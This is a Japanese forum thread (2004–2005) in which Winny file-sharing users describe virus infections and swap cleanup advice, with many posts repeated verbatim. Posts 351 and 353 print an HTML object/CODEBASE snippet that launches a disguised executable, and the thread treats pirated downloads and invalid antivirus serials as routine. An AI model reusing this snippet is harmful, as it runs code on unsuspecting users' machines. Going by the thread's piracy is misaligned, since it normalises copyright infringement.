【症状か具体的に、分かる限りすべて書く】左クリックでフォルダを開けなくなった。
フォるダの上で左クリックすると、検索画面が出てしまう。
右クリックをしてみたら、『開く』ではなく『検索』が黒い太文字で一番上に存在し、
検索画面を開くことが最優先のアクションになっていた。
フォルダオプションの『ファイルの種類』を見たところ、フォルダを設定する欄が二つ、
同じフォルダのアイコンで『フォルダファイル』と『フォルダ』が存在していた。
『フォルダファイル』の詳細設定を見ると、動作の欄に『find』とのみが書かれていた。
これのせいだと思います。
しかし、この『フォルダファイル』をが消すことができません。『削除』のボタンが押せなくなっています。
とりあえず、『フォルダファイル』に『開く』の動作を新規で作って対応しているのですが、
フォルダオプションで設定していないにもかかわらず、新しいウィンドウを開いてしまうし…。
この、『ファイルの種類』から『フォルダ ファイル』を消す方法はありますか?
【何をしたらそんなことになったのか】寝ぼけて、間違えてフォルダアイコンのexeファイルを
クリックしてしまった。
【これまでにとった措置】ウイルスの削除をして感染の拡大の防止
すみません。上は『フォルダ ファイル』ではなく『ファイル フォルダ』でした。間違えました。
でも、他の拡張子(なし)の欄と同様で、削除のボタンがグレーになり消せません。
詳細設定で、『同じウィンドウで開く』の欄はグレーになり選択できなくなっていますし…。
でも、他の拡張子(なし)の欄と同様で、削除のボタンがグレーになり消せません。
詳細設定で、『同じウィンドウで開く』の欄はグレーになり選択できなくなっていますし…。
290 :[名無し]さん(bin+cue).rar:04/12/30 12:23:52 ID:6WAZv4S1
他にどんな症状が出るかワカラン
大人しくデータのバックアップを取ってからOSの再インストールをしろ
パソコンの大掃除だと思って諦めろ
大人しくデータのバックアップを取ってからOSの再インストールをしろ
パソコンの大掃除だと思って諦めろ
そうですね。レジストリをいじられただけだとは思うのですが、
他に何か悪さをしていないとは限りませんか…。
年末の大掃除だと思って再インスコしてきます。
ウイルスの悪さが、ちょっとした精神的な嫌がらせなので余計にショックです。
他に何か悪さをしていないとは限りませんか…。
年末の大掃除だと思って再インスコしてきます。
ウイルスの悪さが、ちょっとした精神的な嫌がらせなので余計にショックです。
292 :[名無し]さん(bin+cue).rar:04/12/30 14:58:11 ID:c9kXIc7W
葱でプロトコルその他って何のことですか?
OS再インスコしてもなんやらわけのわからん接続があるので
串代わりに使われてるかも・・・
助けて!!
OS再インスコしてもなんやらわけのわからん接続があるので
串代わりに使われてるかも・・・
助けて!!
294 :[名無し]さん(bin+cue).rar:04/12/30 15:56:47 ID:ryrKqtzp
やっぱり?
プロバイダーに電話して
変えてもらえない?
変わるのにどのくらいかかる?
プロバイダーに電話して
変えてもらえない?
変わるのにどのくらいかかる?
296 :[名無し]さん(bin+cue).rar:04/12/30 20:41:04 ID:Z18pmJSA
297 :[名無し]さん(bin+cue).rar:04/12/30 21:52:20 ID:DPwuo6p8
>295
光かADSLか知らんが、ONUあるいはADSLモデムの電源落とすなり、
再接続するなりして、アドレス再取得しろよ。俺の環境ならIPアドレス
かえるぐらい5秒でできるぞ。どうせならfusianasanしてみたらどうだ?
光かADSLか知らんが、ONUあるいはADSLモデムの電源落とすなり、
再接続するなりして、アドレス再取得しろよ。俺の環境ならIPアドレス
かえるぐらい5秒でできるぞ。どうせならfusianasanしてみたらどうだ?
298 :[名無し]さん(bin+cue).rar:04/12/30 22:55:19 ID:TtbDz4P5
C:\ファイルがふっとんだんだがこれってnyが原因?
めっちゃやる気なくなったんだが。PCは問題ない。
めっちゃやる気なくなったんだが。PCは問題ない。
299 :[名無し]さん(bin+cue).rar:04/12/30 23:00:38 ID:vkESTfoV
>>298
詳しくはよくわかんないけど多分おまえが原因。
詳しくはよくわかんないけど多分おまえが原因。
レスサンクス
>>296
YAHOOなんだがテクニカルサポートは年中無休らしい
知り合いの先輩もトロイが来まくり
その人は初心者でノートンにがんがん引っかかって、
>>297方法も試したけどだめなのでプロバかえた。
俺も変えるしかないかなあ、アドレス再取得できないよ。
10時間ぐらい放置を何回してもだめ。
でもny起動しないとなんもなんないのよ。
>>296
YAHOOなんだがテクニカルサポートは年中無休らしい
知り合いの先輩もトロイが来まくり
その人は初心者でノートンにがんがん引っかかって、
>>297方法も試したけどだめなのでプロバかえた。
俺も変えるしかないかなあ、アドレス再取得できないよ。
10時間ぐらい放置を何回してもだめ。
でもny起動しないとなんもなんないのよ。
ね、IDも変わらないでしょ。
302 :[名無し]さん(bin+cue).rar:04/12/30 23:54:08 ID:DPwuo6p8
>>300
YBBなら、はじめに書いてくれると、いろいろ助言もできたのだが。ちなみにYBBだと、ADSLモデム側
のMACアドレスで半固定的にIPアドレス振ってるからな(ただ、この話は改善されたらしい)
YBBで、別のIPアドレスにしたかったら、24時間以上、電源切って放置らしいぞ。
(24時間単位で管理更新してるそうだ)よって、48時間放置すると、確実に別の
IPアドレスになるとの情報もあり。ただし、局側で空きIPが足りないと、何度、
強制再接続しても結局は同じIPになるという話もある。
スキルがあるなら
ttp://www.musicae.ath.cx/xdsl/netinfo.html
の後ろのほうに書いてある手法で、強制的にIPアドレスを振るという裏技もある。
結局のところ、YBBなんてさっさとやめるのが得策だな。
YBBなら、はじめに書いてくれると、いろいろ助言もできたのだが。ちなみにYBBだと、ADSLモデム側
のMACアドレスで半固定的にIPアドレス振ってるからな(ただ、この話は改善されたらしい)
YBBで、別のIPアドレスにしたかったら、24時間以上、電源切って放置らしいぞ。
(24時間単位で管理更新してるそうだ)よって、48時間放置すると、確実に別の
IPアドレスになるとの情報もあり。ただし、局側で空きIPが足りないと、何度、
強制再接続しても結局は同じIPになるという話もある。
スキルがあるなら
ttp://www.musicae.ath.cx/xdsl/netinfo.html
の後ろのほうに書いてある手法で、強制的にIPアドレスを振るという裏技もある。
結局のところ、YBBなんてさっさとやめるのが得策だな。
303 :[名無し]さん(bin+cue).rar:04/12/30 23:58:10 ID:DPwuo6p8
もひとつ助言として、ちゃんとしたルータをかませ。
304 :[名無し]さん(bin+cue).rar:04/12/31 00:51:06 ID:gBvliaLJ
【使用OS】 windows XP SP2
【WindowsUpdateしてるか】 はい
【AntiVirusは】 してます
【ちゃんとUpdateしてるか】はい
【スキャンした結果】
「W32.Antinny.Q ウィルスに感染しています。このファイルを修復できません。」
や、「W32.Antinny.K ウィルスに感染しています。ファイルへのアクセスが拒否されました。」と出ます。
【Winnyのバージョン】 2.0b7.0
【Winny歴、総DL量は】 長い
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】はい
【症状か具体的に、分かる限りすべて書く】 .exeファイルは開いていません。
症状は特にありませんが気持ち悪いので。
【何をしたらそんなことになったのか】 ダウンロードしたzipファイルを解凍したら
【これまでにとった措置】
まとめサイトやテンプレを読み、できる限り対処はしたのですが、不安です。
(win.iniのぬるぽを削除したり。)
今年でwinnyをもうやめようと思うので、いい機会だと思い、winnyをフォルダごと
削除(落としたファイルも)しました。
.exeを開いたりしていないのですが、解凍しただけでノートンが反応しました。
これは何なのでしょうか?
落としたファイルは削除したのですが、これでもう大丈夫なのでしょうか?
すみませんがどなたか教えてください。
【WindowsUpdateしてるか】 はい
【AntiVirusは】 してます
【ちゃんとUpdateしてるか】はい
【スキャンした結果】
「W32.Antinny.Q ウィルスに感染しています。このファイルを修復できません。」
や、「W32.Antinny.K ウィルスに感染しています。ファイルへのアクセスが拒否されました。」と出ます。
【Winnyのバージョン】 2.0b7.0
【Winny歴、総DL量は】 長い
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】はい
【症状か具体的に、分かる限りすべて書く】 .exeファイルは開いていません。
症状は特にありませんが気持ち悪いので。
【何をしたらそんなことになったのか】 ダウンロードしたzipファイルを解凍したら
【これまでにとった措置】
まとめサイトやテンプレを読み、できる限り対処はしたのですが、不安です。
(win.iniのぬるぽを削除したり。)
今年でwinnyをもうやめようと思うので、いい機会だと思い、winnyをフォルダごと
削除(落としたファイルも)しました。
.exeを開いたりしていないのですが、解凍しただけでノートンが反応しました。
これは何なのでしょうか?
落としたファイルは削除したのですが、これでもう大丈夫なのでしょうか?
すみませんがどなたか教えてください。
305 :[名無し]さん(bin+cue).rar:04/12/31 01:02:17 ID:rDKBfb7h
>解凍しただけでノートンが反応
オートプロテクトとかじゃない?
オートプロテクトとかじゃない?
306 :[名無し]さん(bin+cue).rar:04/12/31 01:08:43 ID:E2kxozxC
>>304
ワクチンが良い仕事をしてたなら無問題と言いたいところだが、
win.iniがぬるぽってたなら、既に感染してたってことだな。
落としたワクチンで防御してるなんて間抜けなことでもやらな
い限り、普通はワクチンインスコ時にわかるもんだが。
ワクチンが良い仕事をしてたなら無問題と言いたいところだが、
win.iniがぬるぽってたなら、既に感染してたってことだな。
落としたワクチンで防御してるなんて間抜けなことでもやらな
い限り、普通はワクチンインスコ時にわかるもんだが。
>>306
win.iniのぬるぽはまだnortonのupdateとかしてなかった去年あたりに.exe開いたことがあって
(あの眼鏡の写真のやつに)感染したままだったみたいでそのときのやつかもしれない
のですが・・・。そのときも落としたファイルを削除しました。
それから最近までnyを離れてて最近また少しやりだしました。
>>305の通りノートンのオートプロテクトで最近のやつには感染してないって考えても
いいのでしょうか?
win.iniのぬるぽはまだnortonのupdateとかしてなかった去年あたりに.exe開いたことがあって
(あの眼鏡の写真のやつに)感染したままだったみたいでそのときのやつかもしれない
のですが・・・。そのときも落としたファイルを削除しました。
それから最近までnyを離れてて最近また少しやりだしました。
>>305の通りノートンのオートプロテクトで最近のやつには感染してないって考えても
いいのでしょうか?
>>302
サンクス。
とりあえずちょうど正月だし放置してみるよ。
その前に勉強かねてリンク先も読んでみるよ。
>>YBBなんてさっさとやめるのが得策
そうかもね。プロバはどこがいいかなぁ。
ルーターなんてカタログ見ても素通りしてたけど
必要なのね。これもお勧めとかある?
サンクス。
とりあえずちょうど正月だし放置してみるよ。
その前に勉強かねてリンク先も読んでみるよ。
>>YBBなんてさっさとやめるのが得策
そうかもね。プロバはどこがいいかなぁ。
ルーターなんてカタログ見ても素通りしてたけど
必要なのね。これもお勧めとかある?
309 :[名無し]さん(bin+cue).rar:04/12/31 01:55:12 ID:GliYX8a/
310 :[名無し]さん(bin+cue).rar:04/12/31 20:07:44 ID:hNTje2Jj
(o^-')b
311 :[名無し]さん(bin+cue).rar:05/01/01 11:14:50 ID:GLUe57a6
あけおめ。本年初トロイをハケーン
W32.Delalot.B.Trojanでした。
ノートン先生ありがd
W32.Delalot.B.Trojanでした。
ノートン先生ありがd
312 :[名無し]さん(bin+cue).rar:05/01/01 14:15:27 ID:O1ZuyFLG
ことよろ。
Delalotがくっついてたファイル名も晒してくれるとありがたい。
Delalotがくっついてたファイル名も晒してくれるとありがたい。
313 :[名無し]さん(bin+cue).rar:05/01/01 16:08:14 ID:NFZ/NuGa
あ〜 やられた。
ワードやエクセルファイルがぬるぽに。
ちきしょう。 早期復活させてやるぜ。
ワードやエクセルファイルがぬるぽに。
ちきしょう。 早期復活させてやるぜ。
314 :[名無し]さん(bin+cue).rar:05/01/01 18:56:22 ID:k5OCEcK+
ウイルスバスター、新年そうそう捕獲乙
315 :[名無し]さん(bin+cue).rar:05/01/01 19:05:23 ID:X5EZ4df7
ウイルスバスター シリアル使えなくなったよ・・・(´・ω・`)ショボーン
316 :[名無し]さん(bin+cue).rar:05/01/01 19:06:42 ID:E8BRpsyR
俺は半月前から使えなかったけど
317 : 【大吉】 【1312円】 :05/01/01 21:04:34 ID:0PgTNePw
新年早々、100G消えちゃったよ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
318 :[名無し]さん(bin+cue).rar:05/01/01 22:28:20 ID:WtNfchFy
ノートン先生新年早々更新ご苦労様です。
319 :[名無し]さん(bin+cue).rar:05/01/01 23:18:02 ID:hBBCh51j
セキュリティ板から誘導されてきました
ウイルスバスター(2004,2005)ともに
起動してるとネットに接続できません
XpをSP2にアップすると
ウイルスバスターを切ってもネットに接続できなくなります
アダルトサイト被害対策の部屋 を参考に調べると
spybotに引っかかる
Windows Ad Tools
n-Case
が削除できません
再起動、セーフモード後にスキャンしても削除した直後に再活動している模様
【使用OS】 win xp sp1
【WindowsUpdateしてるか】 してました。sp2だけは、避けていますが
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 何も出ません
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 違法行為はnyだけです
【何をしたらそんなことになったのか】
【これまでにとった措置】 アダルトサイト被害対策の部屋のレジストリ関連以外
【その他の質問】
ウイルスバスター(2004,2005)ともに
起動してるとネットに接続できません
XpをSP2にアップすると
ウイルスバスターを切ってもネットに接続できなくなります
アダルトサイト被害対策の部屋 を参考に調べると
spybotに引っかかる
Windows Ad Tools
n-Case
が削除できません
再起動、セーフモード後にスキャンしても削除した直後に再活動している模様
【使用OS】 win xp sp1
【WindowsUpdateしてるか】 してました。sp2だけは、避けていますが
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 何も出ません
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 違法行為はnyだけです
【何をしたらそんなことになったのか】
【これまでにとった措置】 アダルトサイト被害対策の部屋のレジストリ関連以外
【その他の質問】
320 :[名無し]さん(bin+cue).rar:05/01/01 23:40:43 ID:Wm84HJNc
誰に誘導されたのか知らんがny関係ないじゃん
>>319
ここ質問スレじゃないから適当にアドバイス
まず、何に困ってるのか簡潔に書け
ネットに接続できないのか
それとも、Windows Ad Tools 、n-Caseを消したいのか
次に、ここはnyのウィルススレだ
ウィルスバスターのことはセキュスレで聞け
ここからがアドバイス
as-awareも併用しる
あと、SP2導入でネットに繋げないんだったら
導入しなければいいだけ
Windows Ad Tools、n-Caseが削除できないなら
ググって自分で解決方法探せ おk?
ここ質問スレじゃないから適当にアドバイス
まず、何に困ってるのか簡潔に書け
ネットに接続できないのか
それとも、Windows Ad Tools 、n-Caseを消したいのか
次に、ここはnyのウィルススレだ
ウィルスバスターのことはセキュスレで聞け
ここからがアドバイス
as-awareも併用しる
あと、SP2導入でネットに繋げないんだったら
導入しなければいいだけ
Windows Ad Tools、n-Caseが削除できないなら
ググって自分で解決方法探せ おk?
322 : 【凶】 【1536円】 :05/01/01 23:44:42 ID:ScZ87KcU
323 :[名無し]さん(bin+cue).rar:05/01/01 23:50:46 ID:X5EZ4df7
324 :[名無し]さん(bin+cue).rar:05/01/02 00:00:52 ID:E8BRpsyR
>>323 12月20くらいれす。
俺なってみんなもそうかな思ったら一部だけだったみたいだけどほぼ完全になったのかな。
だから体験版をバスター1ヶ月マカフィー1ヶ月再インストを考えてる。
nortonでもいいんだけど重くて
俺なってみんなもそうかな思ったら一部だけだったみたいだけどほぼ完全になったのかな。
だから体験版をバスター1ヶ月マカフィー1ヶ月再インストを考えてる。
nortonでもいいんだけど重くて
325 :[名無し]さん(bin+cue).rar:05/01/02 01:30:26 ID:wTrSXl+0
326 :[名無し]さん(bin+cue).rar:05/01/02 01:40:14 ID:bgFw5mb/
動画ファイルでDivx playerにドラッグしただけで感染するウィルス・トロイってあるのかな?
ドラッグした瞬間に、エクスプローラが落ちてwinnyが数回再起動した…。
その後、マイドキュ開くとアイコンが一瞬消えたりと妙な動作をする事がある
(これは気のせいかもしれんけど)。
ちなみにantivirとバスターのオンラインスキャンでは何も見つからない。
レジストリエディタも正常に立ち上がる。
気のせいか…??
一応システムの復帰をかまそうとしたら以前の復元ポイントがすべて消えてるし…。
なんか臭いなぁと。
ドラッグした瞬間に、エクスプローラが落ちてwinnyが数回再起動した…。
その後、マイドキュ開くとアイコンが一瞬消えたりと妙な動作をする事がある
(これは気のせいかもしれんけど)。
ちなみにantivirとバスターのオンラインスキャンでは何も見つからない。
レジストリエディタも正常に立ち上がる。
気のせいか…??
一応システムの復帰をかまそうとしたら以前の復元ポイントがすべて消えてるし…。
なんか臭いなぁと。
327 :[名無し]さん(bin+cue).rar:05/01/02 01:44:00 ID:hrpdTV5n
328 :[名無し]さん(bin+cue).rar:05/01/02 01:59:19 ID:Sv4LB0iW
> その後、マイドキュ開くとアイコンが一瞬消えたりと妙な動作をする事がある
これは、アイコンキャッシュが消費されて書き換わってるだけなので、
ワームやトロイの直接的な影響とは思えない。まぁDivx player側で
メモリリークを起しているなら、ありえるんだが。
症状からしても、Divx playerが理解できない形式のファイル突っ込まれて
メモリ消費して落ちて、explorerとnyも巻き込んだという感じかも
復元ポイントの消去は、どうしてだろーか
これは、アイコンキャッシュが消費されて書き換わってるだけなので、
ワームやトロイの直接的な影響とは思えない。まぁDivx player側で
メモリリークを起しているなら、ありえるんだが。
症状からしても、Divx playerが理解できない形式のファイル突っ込まれて
メモリ消費して落ちて、explorerとnyも巻き込んだという感じかも
復元ポイントの消去は、どうしてだろーか
329 :[名無し]さん(bin+cue).rar:05/01/02 02:06:16 ID:bgFw5mb/
即レスサンクスコ。
でも速攻消した上念を入れてキャッシュも全削除しちまったからなあ…。
エロ動画で「色黒の女の子」がなんとかだったと思う。たしか痴漢モノだよ。
んなもん見たからやられたのかもw あ〜あ。
でも速攻消した上念を入れてキャッシュも全削除しちまったからなあ…。
エロ動画で「色黒の女の子」がなんとかだったと思う。たしか痴漢モノだよ。
んなもん見たからやられたのかもw あ〜あ。
330 :[名無し]さん(bin+cue).rar:05/01/02 02:06:25 ID:hrpdTV5n
やはり釣りか・・・・
331 :[名無し]さん(bin+cue).rar:05/01/02 02:07:30 ID:m757FKon
何故キャッシュまで消すんだか・・・
332 :[名無し]さん(bin+cue).rar:05/01/02 02:11:03 ID:5vK8JMeH
333 :[名無し]さん(bin+cue).rar:05/01/02 02:25:37 ID:bgFw5mb/
>>328
なるほど。理解できました。そんなに心配せんでもいいのかな?
ありがとうございました。
>>330 いや、釣りじゃなくてマジw
>>331 やっぱしびびるよねw 余裕がなくてwを多用するぐらいびびってますw
なるほど。理解できました。そんなに心配せんでもいいのかな?
ありがとうございました。
>>330 いや、釣りじゃなくてマジw
>>331 やっぱしびびるよねw 余裕がなくてwを多用するぐらいびびってますw
334 :[名無し]さん(bin+cue).rar:05/01/02 02:30:12 ID:v9G+qmgC
335 :[名無し]さん(bin+cue).rar:05/01/02 03:13:38 ID:6qwLg8DX
流行種その3・その5で
>■感染ルート
>・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
>・Setup.batやSetup.exeを実行させることで感染。
とあるのですが、
現在わかっている段階で、どのゲームのどのハッシュのものが
ウイルスを含んでいるか、をまとめたリストってあるのでしょうか?
>■感染ルート
>・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
>・Setup.batやSetup.exeを実行させることで感染。
とあるのですが、
現在わかっている段階で、どのゲームのどのハッシュのものが
ウイルスを含んでいるか、をまとめたリストってあるのでしょうか?
336 :[名無し]さん(bin+cue).rar:05/01/02 10:20:34 ID:k2rHQXcv
でえたべえす見なさい
337 :[名無し]さん(bin+cue).rar:05/01/02 18:08:54 ID:v9G+qmgC
>>312 この辺↓かな。
(一般コミック) [木尾士目] げんしけん 第05巻.zip
(一般コミック) [島本和彦] 吼えろペン 第11巻.zip
(一般コミック) [島本和彦] 吼えろペン 第12巻.zip
アンチニーだとtxt.exe混入とかみたいだけど、
Trojan.Whiterはそのものをパッケージしてるんかな。
やっぱサイズでかいね。勉強になりました。
(一般コミック) [木尾士目] げんしけん 第05巻.zip
(一般コミック) [島本和彦] 吼えろペン 第11巻.zip
(一般コミック) [島本和彦] 吼えろペン 第12巻.zip
アンチニーだとtxt.exe混入とかみたいだけど、
Trojan.Whiterはそのものをパッケージしてるんかな。
やっぱサイズでかいね。勉強になりました。
338 :[名無し]さん(bin+cue).rar:05/01/02 19:24:57 ID:4TRZosKM
>>336
詳細キボン
詳細キボン
339 :[名無し]さん(bin+cue).rar:05/01/02 19:28:53 ID:4TRZosKM
自己解決した。スレ汚し悪い。
340 :[名無し]さん(bin+cue).rar:05/01/02 19:38:17 ID:XiWsaBrf
341 :[名無し]さん(bin+cue).rar:05/01/03 00:01:42 ID:y0hOix7m
残念、テンプレのDBのURLはしんでます(しかもガイシュツ
342 :[名無し]さん(bin+cue).rar:05/01/03 22:23:23 ID:j7c0404h
年明け早々言いたかないが
ny関連のウイルス被害のほとんどが
感染に気付かないで流してる連中のせいなんだから始末に悪いな
ny関連のウイルス被害のほとんどが
感染に気付かないで流してる連中のせいなんだから始末に悪いな
343 :[名無し]さん(bin+cue).rar:05/01/03 23:14:09 ID:K3RjAQkI
antiny.R ってのが消せません。
バスター入れて全スキャンしてwinnyフォルダも丸ごと消したんですが定期的にDフォルダの
System Volume Informationってとこに沸きます。レジストリも1個ずつ調べて怪しげなの削除したんですがもう
自力で治す方策を見失いました。何か助言無ければ再インスコします、最後に助けて!
バスター入れて全スキャンしてwinnyフォルダも丸ごと消したんですが定期的にDフォルダの
System Volume Informationってとこに沸きます。レジストリも1個ずつ調べて怪しげなの削除したんですがもう
自力で治す方策を見失いました。何か助言無ければ再インスコします、最後に助けて!
344 :[名無し]さん(bin+cue).rar:05/01/03 23:26:31 ID:IGWKZJYK
>>343
System Vol(ryの中の何てところ?
System Vol(ryの中の何てところ?
345 :[名無し]さん(bin+cue).rar:05/01/03 23:35:21 ID:TxSGpCMD
>343
「System Volume Information ウィルス」でぐぐってみた?
「System Volume Information ウィルス」でぐぐってみた?
346 :[名無し]さん(bin+cue).rar:05/01/04 01:17:30 ID:IFYUFfM3
>>343
さっさとフォーマットし直せ
さっさとフォーマットし直せ
347 :[名無し]さん(bin+cue).rar:05/01/04 02:04:37 ID:eNEhfz1F
エロゲー落としてるような連中が感染しようと
いい気味だな
よくEXEなんて実行できるな、誰が作ったからもわからんのに
いい気味だな
よくEXEなんて実行できるな、誰が作ったからもわからんのに
348 :[名無し]さん(bin+cue).rar:05/01/04 02:22:38 ID:A9NfV79t
検証用のPC買っとけよ
349 :[名無し]さん(bin+cue).rar:05/01/04 07:26:53 ID:Ydwlou2S
>345
わかりました。ありがとうございます。
わかりました。ありがとうございます。
351 :[名無し]さん(bin+cue).rar:05/01/04 13:46:07 ID:0ThinGSi
こんなものが出てきました。
<html><head><title></title><object CLASSID='CLSID:03D443D8-7FD2-4F6D-875C-5F278E2F8DC4' CODEBASE='000表紙.txt.exe'>
</object><script>window.location = "./";</script></head><body></body></html>
<html><head><title></title><object CLASSID='CLSID:03D443D8-7FD2-4F6D-875C-5F278E2F8DC4' CODEBASE='000表紙.txt.exe'>
</object><script>window.location = "./";</script></head><body></body></html>
352 :[名無し]さん(bin+cue).rar:05/01/04 14:50:11 ID:wHNv7G8d
これ自分でもやってみようとしたことがあるけど、結局CLASSIDがわからなかったから挫折したんだよなぁ。
調べてもわからなかったし、所詮俺がへたれってことか……
調べてもわからなかったし、所詮俺がへたれってことか……
353 :[名無し]さん(bin+cue).rar:05/01/04 16:14:16 ID:hZBEeMPK
この脆弱性(仕様?)classidってなんでもいいんじゃなかったけ?
<object classid="clsid:01234567-89AB-CDEF-0123-456789ABCDEF" codebase="c:\windows\system32\notepad.exe"></object>
<object classid="clsid:01234567-89AB-CDEF-0123-456789ABCDEF" codebase="c:\windows\system32\notepad.exe"></object>
354 :[名無し]さん(bin+cue).rar:05/01/04 17:34:08 ID:ZXU3zm78
スレ違いかも知れないが、少し質問を。
nyで落とした物をノートンアンチウィルスでスキャンしたらスクリプトエラーが出た(詳細は憶えてない)。
で、再度十数分後にスキャンしたら出なかったんだが、こういうことってあります?
nyで落とした物をノートンアンチウィルスでスキャンしたらスクリプトエラーが出た(詳細は憶えてない)。
で、再度十数分後にスキャンしたら出なかったんだが、こういうことってあります?
355 :[名無し]さん(bin+cue).rar:05/01/04 17:42:50 ID:3ET/V/0p
356 :[名無し]さん(bin+cue).rar:05/01/04 17:47:23 ID:ZXU3zm78
>>355
ご丁寧にありがとうございました。
ご丁寧にありがとうございました。
357 :[名無し]さん(bin+cue).rar:05/01/04 19:59:11 ID:H6qslK8q
血飛沫がでました。
え〜と思い電源消しました。
電源いれてしばらくたつとまた血がそれも少し量が多くなって
でまた消しました。
また電源入れてそしてウイルス感染してるプログラムファイル(jpg)発見。
でも削除できない。血飛沫がでてきた。
また電源けしました。電源入れて、そんでTempの怪しいテキストデータなどを消しました。
なんか、三人娘の画像だったのもありました。
で一応血飛沫はとまりました?いつ起こるかわからないうちに
必要なデータを全部外付けHDDにバックアップしました。(そのHDDもスキャン済み)
で、テキストデータとかみたらやられてないのでよかったです。
テキストデータなどを破壊するのっててっきり血飛沫から始まってる
かとおもったけど違うんですね?画面が真っ赤ぬるぽ文字になったら破壊活動するん
でしょうか?
え〜と思い電源消しました。
電源いれてしばらくたつとまた血がそれも少し量が多くなって
でまた消しました。
また電源入れてそしてウイルス感染してるプログラムファイル(jpg)発見。
でも削除できない。血飛沫がでてきた。
また電源けしました。電源入れて、そんでTempの怪しいテキストデータなどを消しました。
なんか、三人娘の画像だったのもありました。
で一応血飛沫はとまりました?いつ起こるかわからないうちに
必要なデータを全部外付けHDDにバックアップしました。(そのHDDもスキャン済み)
で、テキストデータとかみたらやられてないのでよかったです。
テキストデータなどを破壊するのっててっきり血飛沫から始まってる
かとおもったけど違うんですね?画面が真っ赤ぬるぽ文字になったら破壊活動するん
でしょうか?
358 :[名無し]さん(bin+cue).rar:05/01/04 20:39:09 ID:13mnv6Zd
>>357
お疲れ様でした
お疲れ様でした
359 :[名無し]さん(bin+cue).rar:05/01/04 21:41:06 ID:D86CN83k
そういえば、ぞろ目発動は元旦も含むんだっけか?
360 :[名無し]さん(bin+cue).rar:05/01/04 22:00:56 ID:3JEfcyKu
>>357
ごちそう様でした
ごちそう様でした
361 :[名無し]さん(bin+cue).rar:05/01/04 22:16:39 ID:TUoigmaq
>>357
ガッ
ガッ
362 :[名無し]さん(bin+cue).rar:05/01/05 00:19:03 ID:G5O4A7wI
>>357
おなかいっぱいです。ゲフッ
おなかいっぱいです。ゲフッ
363 :[名無し]さん(bin+cue).rar:05/01/05 00:56:57 ID:CAb0Tw5k
>>337
血の量ってどんどん多くなるの(;´Д`)
誰か感染した後どうなるのか見せ場をダイジェストした
動画とか流してくれ。あ、オレは金銭的にも技術的にも無理だから。
そういえば里帰りしたときにdos時代のウイルス辞典見つけて読んだが
あの時代のは面白い画面効果のウィルスが色々あるんだな。
血の量ってどんどん多くなるの(;´Д`)
誰か感染した後どうなるのか見せ場をダイジェストした
動画とか流してくれ。あ、オレは金銭的にも技術的にも無理だから。
そういえば里帰りしたときにdos時代のウイルス辞典見つけて読んだが
あの時代のは面白い画面効果のウィルスが色々あるんだな。
364 :[名無し]さん(bin+cue).rar:05/01/05 04:34:56 ID:HwFx1DNL
>>357
jpgってプログラムファイルだったのか…
jpgってプログラムファイルだったのか…
365 :[名無し]さん(bin+cue).rar:05/01/05 07:59:37 ID:2o7wjMgw
ダウンフォルダに落とした覚えの無いファイルがテンコ盛り、ウィルスファイルがテンコ盛り、もうダメポ?
366 :[名無し]さん(bin+cue).rar:05/01/05 10:51:46 ID:ZNH/L0AT
/::'-イ / // l: ヽ ヽ ,ゝニ二ヽ rrrrr、
77/ .: .:/ l// |:: ヽ :', /,イ:ト、-'::イ /´ /
/// .:: :::// .:l | |:::. ::! ::::! イ://::!:::`´ l / /
/〈:! / ::| ::/lハ ::| | |:::|:. :. :::::::::l...|:| |::|ヽ!::: ! / /
/ .:lハ .::l|-l十ト、:::ト|:.| :lハ::|:::. ::..:::::::l:::!::ヾjイ |::: | ヽ __ノ´}
. / .::/∧N Yた卞N| N|:.:/_立ト、:、:::::::!:::l:::/|::::! /::: l ト--'´|
/ .::://:://| 弋ツ ヽ' た卞、ll:::::l::ハ|:::∧/ !::::: ! ,{ !ヽ
. 〃 .::://ノr,=ァ 弋ツノノ!イく_/ l::::: l / | ! }
〃 .::://:::|| l´f、 _' _ ィ、l::::|ノ,. -、 |::::: | / / |-'
!! :/イ::::∧ ``丶 ` / }ノ j!:l::!``ヽ´___!:::: | / l l
|//:l::::/ ハ>―-、`ト-,--‐ '|| ´ ´l::l::l _}ヽ |:::::: |``丶、 / l |
..::/::::::l::/r '´ \,.ゝ-―||<´l:::!::!´ ̄ イ__ !::::::.l! \ニ_―--'、 !
:/ :::::::!::! ! ,>‐-、 / ヾ、 `|::|::|-―-,=' !|:::::::|:l \`ヽ、 `ヽ、 |
'ヽ::::::|l::トゝ' { ァ──-ト|::!:::!ニ_´ / |::!:::::!:', \ `` `丶l
ニ=ヽ:!:l:!::Y´ ヽ/ |!l::!!:::! / l::l:l::::!::゙、 丶、 `
―--|:,ゝ' /く ノノ,!:!゙、:', l/ ヽ l::l::',::ヽ::ヽ ``
ニ=-‐/ / / -=´'´/ ヾ、ヽヽ ヽ ヽ l::l::ヽ:::::::::ヽ
:::::::::::{ _, '´ / / }〉 ヽヽ 〉 ゙、ヽ::ヽ:::::::::ヽ
=-‐_'∧ ヽ // \\--‐'´ヽヽ::丶、::::::\‐--------―‐
 ̄ ` ー--‐ '´ ̄ ヽ、\ _,,>ー―‐'-`-`--‐丶\:::::::::`丶、`丶、
77/ .: .:/ l// |:: ヽ :', /,イ:ト、-'::イ /´ /
/// .:: :::// .:l | |:::. ::! ::::! イ://::!:::`´ l / /
/〈:! / ::| ::/lハ ::| | |:::|:. :. :::::::::l...|:| |::|ヽ!::: ! / /
/ .:lハ .::l|-l十ト、:::ト|:.| :lハ::|:::. ::..:::::::l:::!::ヾjイ |::: | ヽ __ノ´}
. / .::/∧N Yた卞N| N|:.:/_立ト、:、:::::::!:::l:::/|::::! /::: l ト--'´|
/ .::://:://| 弋ツ ヽ' た卞、ll:::::l::ハ|:::∧/ !::::: ! ,{ !ヽ
. 〃 .::://ノr,=ァ 弋ツノノ!イく_/ l::::: l / | ! }
〃 .::://:::|| l´f、 _' _ ィ、l::::|ノ,. -、 |::::: | / / |-'
